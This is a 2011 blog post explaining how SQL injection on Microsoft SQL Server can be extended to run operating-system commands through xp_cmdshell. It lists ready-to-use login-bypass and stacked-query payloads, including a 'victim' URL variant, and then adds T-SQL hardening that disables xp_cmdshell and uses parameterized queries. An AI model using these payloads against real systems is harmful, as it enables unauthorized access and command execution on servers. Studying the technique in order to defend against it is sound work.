
If you have been a regular reader of my blog, you might remember the following type of SQL queries:

1 ' OR ' 1 ' = ' 1
a ' OR ' 1 ' = ' 1

a ' OR ' a ' = ' a

Login: 1 ' OR ' 1 ' = ' 1
Password : 1 ' OR ' 1 ' = ' 1
http://victim/index.asp?id=1 ' OR ' 1 ' = ' 1

and similar variants; they are all usually used to bypass a login page. While discussing SQL injection I mentioned several times that SQL injection is a kind of command injection attack. You might wonder: if SQL injection is a kind of command injection attack, then how can I execute commands using it? I intentionally left out the command injection part of SQL injection so that I could cover it while discussing command injection.

First of all, command injection using SQL injection works only against a Windows-based shell, which means it will not work on Linux. Now, how does it work? As we know, SQL injection is not only a command injection attack, it is also a code injection attack, because each statement in SQL is interpreted code that ends with ' ; ' (semicolon), which acts as the statement terminator. During ordinary SQL injection you intentionally never use the statement terminator, because you already know the web application adds it automatically. When injecting commands, a hacker can exploit this to execute commands through SQL injection by terminating the statement and appending the following command:
exec master..xp_cmdshell "" --


If the victim is vulnerable to a command injection attack via SQL injection, then any SQL query you can inject will 100% support the appended code above. Have a look at the following examples:

1 ' OR ' 1 ' = ' 1 ' ; exec master..xp_cmdshell "dir c:\" --
1 ' ; exec master..xp_cmdshell "dir c:\" --


The above commands will list all folders and files on the C drive of the victim.

a ' OR ' 1 ' = ' 1 ; exec master..xp_cmdshell "echo You got hacked>file.txt " --
a ' ; exec master..xp_cmdshell "echo You got hacked>file.txt " --


The above statements will add a file on the system containing the message You got hacked.

a ' OR ' a ' = ' a '; exec master..xp_cmdshell "ping 127.0.0.1" --
Login: 1 ' OR ' 1 ' = ' 1 ' ; exec master..xp_cmdshell "ping 127.0.0.1" --

The above statements will ping the victim system.

Password : 1 ' OR ' 1 ' = ' 1 ' ; exec master..xp_cmdshell "ver" --

The above statement will display the name and version of the victim system. And there should be no surprise, because even this works:

http://victim/index.asp?id=1 ' OR ' 1 ' = ' 1 ' ; exec master..xp_cmdshell "mkdir hacker" --

Source: nrupentheking.blogspot.com
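
The payloads above depend on three conditions on a Microsoft SQL Server back end: the query is built by string concatenation, xp_cmdshell is enabled, and the application's login is allowed to run it. The T-SQL below is an added example, not from the original post, that audits and removes each condition; the login name webapp_login and the temp table #Users are hypothetical.

```sql
-- Added hardening example for Microsoft SQL Server; not from the original post.
-- Assumptions: webapp_login is a hypothetical login used by the web application,
-- and #Users is a constructed temp table standing in for the real user table.

-- 1. Audit: value_in_use = 1 means xp_cmdshell can be called right now.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 2. Disable it. xp_cmdshell is an advanced option, so expose those first,
--    then hide them again afterwards.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 3. Least privilege: a sysadmin login can simply turn xp_cmdshell back on,
--    so the application login must not be one. 1 = member, 0 = not a member.
SELECT IS_SRVROLEMEMBER('sysadmin', 'webapp_login') AS app_login_is_sysadmin;

-- 4. Constructed sample data and the two payload shapes from the article.
CREATE TABLE #Users (user_id int, login_name nvarchar(64));
INSERT INTO #Users VALUES (1, N'alice');

DECLARE @tautology nvarchar(200) = N'1'' OR ''1''=''1';
DECLARE @stacked   nvarchar(200) = N'a''; exec master..xp_cmdshell "ver" --';

-- Vulnerable pattern, printed instead of executed: after concatenation the
-- input has closed the string literal and become part of the SQL text.
PRINT N'SELECT user_id FROM #Users WHERE login_name = ''' + @stacked + N'''';

-- Hardened pattern: the statement text is fixed and the input is bound to
-- @login as data, so the payloads are compared against login_name as
-- plain strings and nothing after the quote is parsed as SQL.
DECLARE @sql nvarchar(200) = N'SELECT user_id FROM #Users WHERE login_name = @login';
EXEC sp_executesql @sql, N'@login nvarchar(200)', @login = @tautology;
EXEC sp_executesql @sql, N'@login nvarchar(200)', @login = @stacked;
EXEC sp_executesql @sql, N'@login nvarchar(200)', @login = N'alice';

DROP TABLE #Users;
```

Step 2 needs a login with the ALTER SETTINGS permission, which should be a DBA account and never the application's own login.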




Last Updated (Tuesday, 21 June 2011 06:59)

 

Comments  

 
+1 #1 Dave 2011-06-21 07:04
But how do you prevent it, then?
http://www.texaswebdevelopers.com/blog/template_permalink.asp?id=107